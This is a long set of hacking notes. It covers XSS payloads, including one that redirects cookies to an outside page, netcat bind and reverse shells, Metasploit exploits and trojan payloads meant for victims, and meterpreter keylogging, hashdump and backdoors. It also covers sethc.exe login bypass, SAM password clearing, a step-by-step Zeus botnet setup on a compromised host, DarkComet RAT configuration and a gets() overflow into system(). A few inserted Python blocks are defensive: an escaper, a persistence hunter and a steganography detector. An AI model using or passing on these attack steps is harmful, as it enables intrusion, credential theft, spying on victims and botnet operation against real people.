onmouseover="alert('Hacked');"

Attack 1: Desired Result

<a href="mailto:[email protected]" onmouseover="alert('Hacked');">Bob Smith</a>

Attack 1: Attack String

[email protected]" onmouseover="alert('Hacked');


Attack 1: Actual Result

<a href="mailto:[email protected]" onmouseover="alert('Hacked');">Bob Smith</a>

Success! Mouse over the Name you entered and you see a popup that says "I hacked you".

At this point we have proven that we can insert code onto the site and have it executed by a web

browser!

This attack is only executed based on a user event (the user mousing over the link)

Let's try creating a script tag, which will get executed while the page is loaded by the browser (so basically right away).

-----------------------------------------------------------------------------------------------------------------------------

Attack #2 – Against Email Address

=================================

Attack 2: Original

<a href="mailto:[email protected]">John Doe</a>

Attack 2: Desired addition

<script>alert('Hacked');</script>

Attack 2: Desired Result

<a href="mailto:[email protected]"><script>alert('Hacked');</script><">Bob Smith</a>

Attack 2: Attack String

[email protected]"><script>alert('Hacked');</script><"

Attack 2: Actual Result

<a href="mailto:[email protected]"&gt;&lt;script&gt;alert('Hacked');&lt;/script&gt;&lt;"">Bob Smith</a>

Failure! No popup takes place.

Notice the Actual Result does not match the Desired Result.

This is because of htmlentities as mentioned in the helper notes.

-----------------------------------------------------------------------------------------------------------------------------

Attack #3 – Against Title

=========================


Attack 3: Original

<td>Works Great</td>

Attack 3: Desired addition

<script>alert('Hacked');</script>

Attack 3: Desired Result

<td><script>alert('Hacked');</script></td>

Attack 3: Attack String

Works Great<script>alert('Hacked');</script>

Attack 3: Actual Result

<td>Works Great<script>alert(&#39;Hacked&#39;);</script></td>

Failure! No popup takes place.

This almost worked, except that the single and double quotes get escaped, so let's try making something that doesn't need quotes.

-----------------------------------------------------------------------------------------------------------------------------

Attack #4 – Against Title

=========================

In the alert function let's use the global variable document.domain in the attack string.

Attack 4: Attack String

Works Great<script>alert(document.domain);</script>

Attack 4: Actual Result

<td>Works Great<script>alert(document.domain);</script></td>

Success! A popup should appear that says hackme.ntobjectives.com

Maybe this isn't convincing enough… let's try cookies.

-----------------------------------------------------------------------------------------------------------------------------

Attack #5 – Against Title

=========================


Attack 5: Attack String

Works Great<script>alert(document.cookie);</script>

Attack 5: Actual Result

<td>Works Great<script>alert(document.cookie);</script></td>

Success! A popup should appear that shows all your cookie data.

There's nothing stopping the hacker from having the user send this data to their server.

I have set up a page for displaying inputs sent to it, but it makes sure to escape characters to make sure this isn't an attack point.

http://hackme.ntobjectives.com/xss/bin.php

Try it now

http://hackme.ntobjectives.com/xss/bin.php?abc=123

You should be shown that abc=123

This page will display anything you put in the GET params.

I want to push your cookie data over to my site, so that I can attempt a session take over.

-----------------------------------------------------------------------------------------------------------------------------

Attack #6 – Against Title

=========================

Attack 6: Original

<td>Works Great</td>

Attack 6: Desired addition

<script>window.location='http://hackme.ntobjectives.com/xss/bin.php?var='+document.cookie;</script>

We have already established that I cannot insert those single quotes that I need around the URL, so we need to move on to slightly more advanced methods.

Using the javascript function String.fromCharCode allows me to get around needing quotes by turning each decimal value into its character, and it doesn't require any quotes.


So we just convert our desired string into decimal first

This:

http://hackme.ntobjectives.com/xss/bin.php?var=

becomes:

104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61

and the attack string becomes

Attack 6: Attack String

Works Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script>

Attack 6: Actual Result

<td>Works Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script></td>

Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing

you all the data from your cookies.

If this were an attacker's site, it would just collect the info and pass you back to the page you came from, and it's unlikely you would have ever noticed that your session information had been stolen.
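The two half-measures the Hands On series ran into (the Email field encoded angle brackets but not quotes, so Attack 1 broke out of the href attribute while Attack 2 failed; the Title field encoded quotes but not angle brackets, so Attack 3 failed while the quote-free Attacks 4-6 worked), reproduced beside a full HTML escaper as an added example that is not part of the original notes. The row markup, the bob@example.com addresses and all function names are constructed.

```python
"""Output encoding for the two injection points used in the Hands On series.

Added example, not from the original notes. Both weak filters are reproduced
next to a full escaper and the guestbook row from the notes is rendered with each.
"""
import html
import re


def angle_only(value: str) -> str:
    """Weak filter the Email field behaved like: only < and > are encoded."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def quotes_only(value: str) -> str:
    """Weak filter the Title field behaved like: only quotes are encoded."""
    return value.replace('"', "&quot;").replace("'", "&#39;")


def escape_html(value: str) -> str:
    """Encode &, <, >, double and single quotes so the value is inert both as
    text and inside the double-quoted attribute this renderer uses."""
    return html.escape(value, quote=True)


def render_row(email: str, name: str, title: str, escape=escape_html) -> str:
    """Constructed guestbook row from the notes: mailto link plus title cell."""
    return (f'<tr><td><a href="mailto:{escape(email)}">{escape(name)}</a></td>'
            f'<td>{escape(title)}</td></tr>')


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
# a quote closing the href value followed by a fresh on*= handler (Attack 1)
EVENT_HANDLER = re.compile(r'"\s+on\w+\s*=', re.IGNORECASE)


def raw_markup_survives(markup: str) -> bool:
    """True if a raw <script tag or an injected event handler reached the output.
    This checks markup structure only, not whether the JavaScript would parse."""
    return bool(SCRIPT_TAG.search(markup) or EVENT_HANDLER.search(markup))


# Attack strings from the notes, with constructed placeholder addresses.
ATTACK1_EMAIL = "bob@example.com\" onmouseover=\"alert('Hacked');"
ATTACK2_EMAIL = "bob@example.com\"><script>alert('Hacked');</script><\""
ATTACK4_TITLE = "Works Great<script>alert(document.domain);</script>"

if __name__ == "__main__":
    for label, escape in (("angle_only", angle_only),
                          ("quotes_only", quotes_only),
                          ("escape_html", escape_html)):
        rows = [render_row(ATTACK1_EMAIL, "Bob Smith", "Works Great", escape),
                render_row(ATTACK2_EMAIL, "Bob Smith", "Works Great", escape),
                render_row("bob@example.com", "Bob Smith", ATTACK4_TITLE, escape)]
        print(label, [raw_markup_survives(r) for r in rows])
```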


7. Shell Uploading & Defacement


8. PHP Disclosing [ site.com/a.php?id=index.php ] [ Disclose index.php ]


9. Manipulating Parameters

Step1 : open the site and search for hidden elements...


Step2 : Change the hidden element's value using Tamper Data or the developer toolkit [ Firefox add-ons ]


10. Dictionary Attack


11. Heart bleed


12. DNS Zone Transfer


13. Brute Force Attack Against SCADA Systems


System Hacking

1. ADS [ Alternate Data Streams ]

Practical Guide to Alternate Data Streams in NTFS

step1 : type "tab.mp4" > C:\hack\tab.mp4:tab.mp4

go to location --> C:\hack\

type command : i. dir -> it shows everything in the directory; confirm that tab.mp4 has been created with 0 KB size, then

ii. start vlc tab.mp4:tab.mp4

To detect ADS files use (only recovery tools can find these files): i. ADS Spy v1.11

ii. get my data back

2. System Password Hacking & Cracking

ophCrack (Crack password)

John The Ripper (Crack password)

Cain & Abel (Crack password)

slax work (Crack password)

hiren boot cd (Remove password)

ERD commander (till win 7) [reset password & repair & recovery of windows from boot sector virus] (Remove password)

Saminside [windows tool] [You can dump any SAM file into it for cracking] (Remove password)

Kon-Boot (Login Page Bypassing)

3. Back Doors

1. Win-XP

> C:\Windows\System32

> copy CMD.EXE

> Change Name to " sethc.exe "

> Put back sethc.exe to " system32 " folder


2. Win-7

> C:\Windows\System32

> look for " ULTRAMAN.EXE ", change its permissions, ownership and name.

> copy cmd.exe to the desktop, rename it to " ULTRAMAN.EXE " and put it back in the system32 folder.

NOW :

> at login page press shift 5 times.

> cmd will pop up type command

> net user <username> /del , /add , * [ remove and reset password ]

3. NetCat : [ Netcat can simply be described as a tool that can read and write to TCP and UDP ports. This dual functionality suggests that Netcat runs in two modes: "client" and "server". ]

I. Connect to TCP/UDP Ports

> localhost ~ # nc -h [ Help ]

> localhost ~ # nc -vv www.site.com 22 [ nc -vv <site> <port> ]

Bind Shell

> Victim / User1 :

> C:\>nc -lvvp 4444 -e cmd.exe

> Attacker / User2 :

> BT ~ # nc -v 192.168.0.198 4444 [ User1 "cmd" comes to User2 ]

Reverse Shell

> User1 :

> C:\>nc -lvvp 4444

> User2 :

> BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash [ Now, User2 is sending

his "shell" to User1 ]


Uploading Netcat After Hacking With Metasploit :

meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\\WINDOWS\\SYSTEM32\\

meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run

meterpreter > reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run -v NETCAT -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1234 -e cmd.exe"

meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run

Note : Netcat can be installed on Win XP, Vista and 7 [ once netcat is installed successfully on the victim OS there is no need to exploit again; use the commands :]

root@bt:~# nc <victim ip> <port>

root@bt:~# nc 192.168.217.141 1234
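A hunt for the Run-key persistence configured with reg setval above, added as an example and not from the original notes: it parses the text that reg query prints for the Run key and flags values that launch a netcat binary or hand a shell to whoever connects. The registry dump, value names and paths are constructed.

```python
"""Hunt netcat persistence in HKLM\\...\\CurrentVersion\\Run.

Added example, not from the original notes. Parses constructed
'reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' output.
"""
import ntpath
import re

NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
# one 'reg query' value line: <name>  <REG_type>  <data>, separated by runs of spaces
ENTRY_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_[A-Z_]+)\s{2,}(?P<data>.*)$")
LISTEN_RE = re.compile(r"(?:^|\s)-[a-zA-Z]*[lL][a-zA-Z]*(?:\s|$)")  # -l, -L, -lvp, -Ldp
EXEC_RE = re.compile(r"(?:^|\s)(?:-e|-c|--exec|--sh-exec)\s+\S*(?:cmd|powershell)", re.I)


def command_binary(cmdline: str) -> str:
    """Program path at the start of a Run value (quoted or bare)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""


def assess_run_value(data: str) -> list:
    """Reasons this Run value looks like netcat persistence (empty if none)."""
    reasons = []
    if ntpath.basename(command_binary(data)).lower() in NETCAT_NAMES:
        reasons.append("netcat_binary")
    if LISTEN_RE.search(data):
        reasons.append("listener_flag")
    if EXEC_RE.search(data):
        reasons.append("spawns_shell")
    return reasons


def find_netcat_persistence(reg_query_output: str) -> list:
    """(value name, reasons) for suspicious entries. A listener flag on its own
    is not enough: plenty of legitimate programs take -l style switches, so a
    hit needs a netcat binary name or a shell handed to the connecting peer."""
    hits = []
    for line in reg_query_output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        reasons = assess_run_value(m.group("data"))
        if "netcat_binary" in reasons or "spawns_shell" in reasons:
            hits.append((m.group("name"), reasons))
    return hits


# Constructed 'reg query ...\Run' output; NETCAT mirrors the reg setval above,
# Updater is a renamed netcat to show the flag-based rule still catches it.
RUN_KEY_DUMP = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    NETCAT    REG_SZ    C:\WINDOWS\system32\nc.exe -L -d -p 1234 -e cmd.exe
    Updater    REG_SZ    C:\Users\Public\svc.exe -lvp 4444 --exec cmd.exe
"""

if __name__ == "__main__":
    for name, reasons in find_netcat_persistence(RUN_KEY_DUMP):
        print(f"{name}: {', '.join(reasons)}")
```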

4. Steganography

1. hiding text on image

> run

> cmd

> cd desktop

> copy /b image.jpg+password.txt final_image.jpg

2. OpenPuff

> Freeware, 256-bit multi-encryption, Carrier chains, Multi-layered obfuscation


5. Detect Steganography

Backtrack Forensics: Steganography

Menu: Forensics -> Forensic Analysis Tools

Directory: /usr/local/bin/

stegbreak

stegcompare

stegdeimage

stegdetect

stegdetect is a tool to detect steganography in image files; it supports different methods used to hide content. Currently, the detectable schemes are: jsteg, jphide (unix and windows), invisible secrets, outguess 01.3b, F5 (header analysis), appendX and camouflage. Stegbreak is used to launch dictionary attacks against JSteg-Shell, JPHide and OutGuess 0.13b.

Before we start to use the tools we need an image which has some hidden content. Let's review a few hiding apps before using stegdetect. As I didn't find any preinstalled in BT, I installed steghide first, which can hide content in jpeg, bmp, wav, au files.

Using steghide:

apt-get install steghide - installation

steghide --info IMG_4422.JPG - get info from the image (how much data can be hidden)

steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass -Z - hide mysecret.txt with password "mypass", and create a new file, where the file is hidden, and don't compress data

steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass - same as the previous but w/ compression

steghide --extract -xf mysecret2.txt -sf steg2.jpg -p mypass - extract the file

The bad news is that stegdetect won't detect the steghide algorithm. Despite that fact, I tried it to see what happens.


Using stegdetect:

stegdetect -t [list of tests] steg.jpg - where tests can be (by default jopifa enabled):

j - Tests if information has been embedded with jsteg.

o - Tests if information has been embedded with outguess.

p - Tests if information has been embedded with jphide.

i - Tests if information has been hidden with invisible secrets.

f - Tests if information has been hidden with F5.

F - Tests if information has been hidden with F5 using a more sophisticated but fairly slow detection algorithm.

a - Tests if information has been added at the end of file, for example by camouflage or appendX.

stegdetect -s[number] steg.jpg - setting sensitivity

Actually stegdetect found jphide for the original and the created image as well, so it's clearly a false positive.

I tried to see what stegbreak can do, and created a list of passwords where I put only one line, the correct password.

stegbreak -f passlist.txt steg.jpg

I got the following error: "stegbreak: fopen: /usr/local/share/stegbreak/rules.ini: No such file or directory"

I downloaded the source and placed the ini file in the said location, but you can also download it from here.

After that I got a "Segmentation fault" error. I couldn't find a working solution for this problem, however it's a known bug.

Second I tried outguess, which can hide info in jpeg files.


Using Outguess :

apt-get install outguess

outguess -k "mypass" -d index.html IMG_4422.JPG out2.jpg - hides index.html in IMG_4422.JPG

Unfortunately stegdetect doesn't detect the hidden file (probably because I used outguess v2), even if increasing the sensitivity, as you can see:

My last try was with jphide, I used the windows version, as I had no luck with installing the one for Linux. It can be downloaded from here.

As you can see stegdetect can detect it, when increasing sensitivity, but it claims the same thing for the original image, so...

stegcompare can compare the original and the image which stores information, but I couldn't figure out what the output means.

stegdeimage - not sure about what it should do, also gives the following error:

"/home/stego_analysis/compress/dscf0033.jpg : error: No such file or directory"

looking at the source code:

if (jpg_open("/home/stego_analysis/compress/dscf0033.jpg") == -1)

return;

it is clear that it will never run, unless you have such an image.

Overall I'm not really convinced by the stegdetect toolset, it's buggy, and doesn't really find steganography correctly.

Official website for steghide: http://steghide.sourceforge.net/

Official website for stegdetect and outguess: http://www.outguess.org/

Official website for jphide: http://linux01.gwdg.de/~alatham/stego.html
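Both the copy /b trick in section 4 and stegdetect's 'a' test in section 5 rely on bytes placed after the JPEG End-Of-Image marker; what follows is an added example (not from the original notes and not stegdetect's code) that walks the JPEG segment structure to find such trailing data, which a naive search for the last or the first FF D9 gets wrong when an EXIF thumbnail or a second appended JPEG is present. The sample byte strings and function names are constructed.

```python
"""Find data appended after a JPEG's End-Of-Image marker.

Added example, not from the original notes. Viewers stop at EOI (FF D9), so an
image with a file concatenated behind it still displays normally. Sample files
below are constructed byte layouts, not real decodable images.
"""

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8)}  # TEM and RST0-RST7 carry no length field


def jpeg_end_offset(data: bytes) -> int:
    """Offset just past the EOI marker, following the marker/segment structure."""
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        while pos < len(data) and data[pos] == 0xFF:  # skip fill bytes
            pos += 1
        if pos >= len(data):
            break
        code = data[pos]
        pos += 1
        if code == EOI:
            return pos
        if code in STANDALONE:
            continue
        if pos + 2 > len(data):
            break
        pos += int.from_bytes(data[pos:pos + 2], "big")  # length counts itself
        if code == SOS:
            # Entropy-coded data: an FF byte is always followed by 00 (stuffing)
            # or by an RSTn marker; anything else is the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def appended_payload(data: bytes) -> bytes:
    """Bytes after EOI; empty for a clean file."""
    return data[jpeg_end_offset(data):]


def _sample_jpeg(app1_extra: bytes = b"") -> bytes:
    """Constructed minimal JPEG layout: SOI, APP1, SOS + scan data, EOI."""
    app1 = b"Exif\x00\x00" + app1_extra
    app1_seg = b"\xff\xe1" + (len(app1) + 2).to_bytes(2, "big") + app1
    sos_hdr = b"\x01\x01\x00\x00\x3f\x00"
    sos_seg = b"\xff\xda" + (len(sos_hdr) + 2).to_bytes(2, "big") + sos_hdr
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"  # includes FF00 stuffing and RST0
    return b"\xff\xd8" + app1_seg + sos_seg + scan + b"\xff\xd9"


CLEAN = _sample_jpeg()
# APP1 payload containing its own SOI/EOI pair, like an EXIF thumbnail does
WITH_THUMB = _sample_jpeg(b"\xff\xd8thumb\xff\xd9")
HIDDEN = WITH_THUMB + b"password.txt: hunter2\n"  # what copy /b produces

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("thumb", WITH_THUMB), ("hidden", HIDDEN)):
        print(name, appended_payload(blob))
```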


Stegdetect :


Steghide :

stegcompare :


outguess :

6. Bypassing Login Page Windows With Backtrack

Make a bootable backtrack pendrive

Boot the system and open backtrack

Open Terminal

mkdir /root/Desktop/p7771 [ Create any folder ]

fdisk -l

mount /dev/sda2 /root/Desktop/p7771 [ Mount Your windows C-Drive ]

ls -la /root/Desktop/p7771/

cd /pentest/password/chntpw

./chntpw -i Desktop/p7771/Windows/System32/config/sam

Press - 1 [ Edit User Data And Password ]

Press - 1 [ Clear Blank User Password ]

Press - q [ Quit ]

Press - y [ Write hive file ? ]


Malwares

1. Botnet

I ] How To Find Cpanel :

A] we need a compromised website with a Symlink attack, eg :

link:www.site.com/akismet/configweb [ it has all the password files ]

1] python cracker.py http://www.pjmi.net/wp-content/plugins/akismet/configweb/ '/root/Desktop/ab' [ copy all passwords to the ab folder from the compromised Symlink website ]

2] upload cpanal.php to your shell.

3] copy all passwords to your cpanal.php

4] run the command on your previous shell "eg: wso.php" to get the user names ---> ls /var/mail

5] copy all user to your cpanel.php

6] click on start it will show you list of active cpanel

7] find website from reverse ip lookup

8] default port for cpanel :2082 [ www.site.com:2082 ]

II ] Configuring Zeus Botnet :

A ] Creating IRC Server :

1] open c-panel

2] go into public folder

3] create folder [ Eg : XXX ]

4] upload your IRC scripts [ Zeus.rar in your cpanel to make your cpanel an IRC Server ]

5] extract the Zeus.rar to server.

6] open www.site.com/XXX/install/index.php

NOW : we will set up a database and link it with our IRC server.

B ] Creating Database :

7] go into cpanel & click into my sql database wizard

8] create a new database and user

Eg : Yahoo >> Next

Eg : User Name = yahoo

Eg : Password = Click on " Generate Password " [ Copy/Rembember [ User Name & Password ]

9] Click on create user.

10] Go to www.site.com/XXX/install/index.php

> give the password that has been generated.

11] Come back to your database page and assign permissions, or click on all privileges.

12] Copy the user name & database name and go to --> www.site.com/XXX/install/index.php [ Under MySQL Server ]

> give the user name.

> give the database name.

13] Click on next step [ Database will be created and linked with the server ]

14] Now, to log in to the botnet panel, we have to give a password [ Eg: abc123 ] in --> www.site.com/XXX/install/index.php [ Under Root User ] [ By default the user will be "admin" ]

15] Now create an encryption key Eg : 123123 [ Under Options : ]

16] Before pressing " install " [ In www.site.com/XXX/install/index.php ] go back to your folder " XXX " [ where you uploaded the server scripts ]

> Right click on --> system [ Folder ]

> Change Permission to --> 777 [ Read-Write-Execute for everyone ]

17] Go back to the control panel [ www.site.com/XXX/install/index.php ] and press " Install "

18] Now go to --> www.site.com/XXX/cp.php

> Username = admin

> Password = abc123

C ] Configuring Bot :

19] Open & extract "client.rar" .

20] Run "gzero.exe"

21] Click on Builder > click on " edit ".

> the configuration file of the bot will be opened.

> replace all links with your server path --> www.site.com/XXX/

> Eg. http://www.rumahbaut.com/xxx/cfg.bin -----> http://www.site.com/xxx/cfg.bin

> Eg. http://www.rumahbaut.com/xxx/tr.exe ------> http://www.site.com/xxx/tr.exe

> Eg. http://www.rumahbaut.com/xxx/gate.php ---> http://www.site.com/xxx/gate.php

> Eg. http://www.rumahbaut.com/xxx/cfg1.bin -----> http://www.site.com/xxx/cfg1.bin

> Eg. Encryption key = 1221421412 ------> your encryption key [ 123123, the one set in step 15 ]

22] Click on " BUILD THE BOT CONFIGURATION " name Eg. BOT

Then ,

23] Click on " BUILD THE BOT EXECUTABLE " name Eg. tr.exe

D] Uploading The Bot :

24] Go to your server folder where you uploaded & extracted your zeus.rar file [ www.site.com/XXX/ ]

25] Upload both files that you have created: "BOT" & "tr.exe"

NOTE : If they don't upload : try to compress and upload, OR upload both bot files from your shell [ wso.php ]

2. Virus

Virus Creators :

Sonic Bat

TeraBit

Infection Virus Maker

Deadline Virus Maker

JPS Virus Maker

Jkymmel Batch Virus Creator

WolfDEM's

Virus Matic

Necro Virus Maker

3. Trojans [ Top Ten RATs ( Remote Administration Tools ) ]

Dark Comet [ Setting Up Dark Comet RAT ]

1. Run client.exe

> allow connection

> Edit Server

> main settings

> connection settings

> IP : Get local IP < Your IP >

> port : < any >

> Server Setup

> melt server

> Server Shield

> Anti Virtual Box

> Icon Settings

> Generate Server

> activate keylogger

> create server

> click on connection.

> port listening mode

2. Give the app to the victim

3. Control its PC

Black Shades

JSpy

Pussy RAT

Bozok RAT

Poison Ivy RAT

Nj RAT

DameWare RAT

jRAT

Cyber Gate

4. Worms

A worm is similar to a virus by design and is considered to be a sub-class of a virus. Worms spread from computer to computer, but unlike a virus, a worm has the capability to travel without any human action. A worm takes advantage of file or information transport features on your system, which is what allows it to travel unaided.

The biggest danger with a worm is its capability to replicate itself on your system, so rather than your computer sending out a single worm, it could send out hundreds or thousands of copies of itself, creating a huge devastating effect. One example would be for a worm to send a copy of itself to everyone listed in your e-mail address book. Then the worm replicates and sends itself out to everyone listed in each receiver's address book, and the chain continues on down the line.

Due to the copying nature of a worm and its capability to travel across networks, the end result in most cases is that the worm consumes too much system memory (or network bandwidth), causing web servers, network servers and individual computers to stop responding. In recent worm attacks such as the much-talked-about Blaster worm, the worm has been designed to tunnel into your system and allow malicious users to control your computer remotely.

Penetration testing

Types Of Testing :

1. White-Box Testing

2. Black-Box Testing

3. Grey-Box Testing

4. Internal Testing

5. External Testing

Process Of Pen-testing :

1. Information gathering

2. Scanning & Banner Grabbing

3. Vulnerability Scanning

4. Exploitation ( Obtaining Access )

5. Maintaining Access & Erasing Evidence

Tools :

1. Metasploit

2. Core-impact

METASPLOIT

Vulnerability : A weakness that allows an attacker to compromise the security of a system.

Exploit : Code that takes advantage of a specific vulnerability to run the attacker's payload on the target ( eg: ms08_067_netapi ).

Payload : The code that runs on the target after a successful exploit ( eg: a meterpreter shell, delivered as bind_tcp or reverse_tcp ).

Encoders : Transform the payload bytes to avoid bad characters ( eg: null bytes ) and, to a limited degree, signature-based detection; they do not remove tracks.

Need for Metasploit

1. It is difficult to manage, update and customize the dozens of exploits available on the internet for different technologies

2. Customizing exploits is time consuming and also needs high skill

METASPLOIT

Testing framework for penetration testing; contained 1300+ exploits when these notes were written. Useful references :

http://cve.mitre.org

rapid7.com

www.exploit-db.com

I. Windows XP

To open Metasploit in Kali Linux or BackTrack use the command : msfconsole

RCE ( Netapi ) ( Remote Code Execution ) [ Win XP SP2, SP3 -> vulnerable OS ]

msfconsole

search netapi

use exploit/windows/smb/ms08_067_netapi [ Microsoft bulletin MS08-067, CVE-2008-4250 ]

show options

set RHOST [TARGET IP] -> 192.168.1.20

set PAYLOAD windows/meterpreter/bind_tcp [ target listens, we connect to it; no LHOST needed ]

OR

set PAYLOAD windows/meterpreter/reverse_tcp [ target connects back to us; test other payloads also ]

set LHOST 192.168.1.150 [ Attacker IP address, needed for reverse_tcp ]

exploit

So we got a successful meterpreter session; it means you are remotely logged in to the XP OS.

Now use the help command to list the meterpreter commands.

Meterpreter Commands

meterpreter > getuid

meterpreter > ps

meterpreter > migrate 1444 [ PID taken from ps; migrate into a stable process that runs as SYSTEM/admin, so the session survives if the exploited service dies ]

meterpreter > idletime

meterpreter > hashdump

meterpreter > screenshot

meterpreter > shell

c:\> net user root * [ prompts for a new password for the "root" account ]

c:\> exit

Uploading Netcat :

meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\\WINDOWS\\SYSTEM32\\ [ BackTrack path; on Kali the binary is /usr/share/windows-binaries/nc.exe ]

meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run

meterpreter > reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run -v NETCAT -d 'C:\\WINDOWS\\system32\\nc.exe -L -d -p 1234 -e cmd.exe'

meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run [ confirm the NETCAT value is there ]

[ nc.exe flags : -L listen again after the client disconnects, -d detach from the console, -p listen port, -e program to run for each connection ]

Note : Netcat can be installed on Win XP, Vista, 7. Once netcat is installed on the victim OS there is no need to exploit again; after a reboot just connect :

root@bt:~# nc <victim ip> <port>

root@bt:~# nc 192.168.217.141 1234

More Commands :

meterpreter > cat <file name>

meterpreter > download C:\\<file name>

meterpreter > upload <local file> C:\\<remote path>

meterpreter > search -d C:\\ -f <pattern>

meterpreter > keyscan_start

meterpreter > keyscan_dump

meterpreter > keyscan_stop

meterpreter > uictl disable keyboard

meterpreter > uictl enable keyboard

meterpreter > run [ press tab to show many more scripts ]

meterpreter > run vnc

Creating Backdoor :

meterpreter > run metsvc [ installs the meterpreter service as a backdoor; it listens on TCP port 31337 by default ]

meterpreter > background [ to go back to the msf prompt ]

NOTE : What if our connection breaks, or the victim patches the vulnerability? To connect to our "Backdoor" :-

use exploit/multi/handler

set PAYLOAD windows/metsvc_bind_tcp

show options

set RHOST < victim >

set LPORT 31337 ---------> because our backdoor is listening on port 31337.

exploit

meterpreter >

II. Windows Server 2003

Windows Server Hacking [ 2003 SP1, SP2 ]

RCE ( Netapi ) ( Remote Code Execution ) [ Windows Server 2003 SP1, SP2, platinum ]

msfconsole

use exploit/windows/smb/ms06_040_netapi

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [MY IP ADDRESS]

set RHOST [TARGET IP]

exploit

III. Windows 7

Windows 7 Hacking

(dot)EXE [ Trojan ] [ Hack Any Windows OS ]

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444 X > /root/12345.exe

[ msfpayload was retired in 2015; the same file with msfvenom : msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444 -f exe -o /root/12345.exe ]

NOTE : Give 12345.exe [ the trojan ] to the victim, then start the handler :

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST < Our IP >

set LPORT 4444 ---------> because our executable connects back to port 4444

exploit

meterpreter >

IV. Browser Exploits

Autopwn [ combination of many browser exploits ] [ See also : the Java JMX bean exploit, exploit/multi/browser/java_jre17_jmxbean ]

use auxiliary/server/browser_autopwn

show options

set LHOST <My Ip >

set SRVHOST < My Server is hosted on my computer so again my ip >

set SRVPORT 80

set URIPATH /

exploit

V. Aurora Exploit [ MS10-002, Internet Explorer ]

msf > use exploit/windows/browser/ms10_002_aurora

msf > show options

msf > set URIPATH /

[ the victim must open http://192.168.42.131/ , the address the exploit server listens on ]

msf > show payloads

msf > set PAYLOAD windows/vncinject/reverse_tcp

msf > show options

msf > set LHOST 192.168.17.128

msf > exploit

VI. Windows 8

Attacker :

1. Start a terminal :

2. root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444 X > /root/12345.exe

Now give this 12345.exe <- trojan to the victim. Then run :

root@bt:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set LHOST 192.168.17.128

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > exploit

VII. DLL Injection

1. Hack Windows 7 with Metasploit using Kali Linux.

Machine 1: Host Kali Linux Machine

Machine 2: Target Windows 7 Machine

msfconsole

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

msf > set payload windows/meterpreter/reverse_tcp

msf > show options

msf > set SRVHOST 192.168.31.20

msf > set LHOST 192.168.31.20

msf > exploit

msf > sessions

msf > sessions -i 1

meterpreter >

Buffer Overflow

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char *name;
    char *command;

    name = (char *)malloc(10);
    command = (char *)malloc(128);

    printf("address of name is : %p\n", (void *)name);
    printf("address of command is : %p\n", (void *)command);
    printf("Difference between addresses is : %ld\n", (long)(command - name));

    printf("Enter your name : ");
    gets(name);                 /* no bounds check: input longer than the gap overwrites command */
    printf("Hello %s\n", name);

    system(command);            /* runs whatever now sits in command */
    return 0;
}

root@kali:~#

root@kali:~# gcc buffer.c -o buffer

root@kali:~# ./buffer

Eg: Input : 347582347y5823458723453425534523453452345234cat /etc/passwd

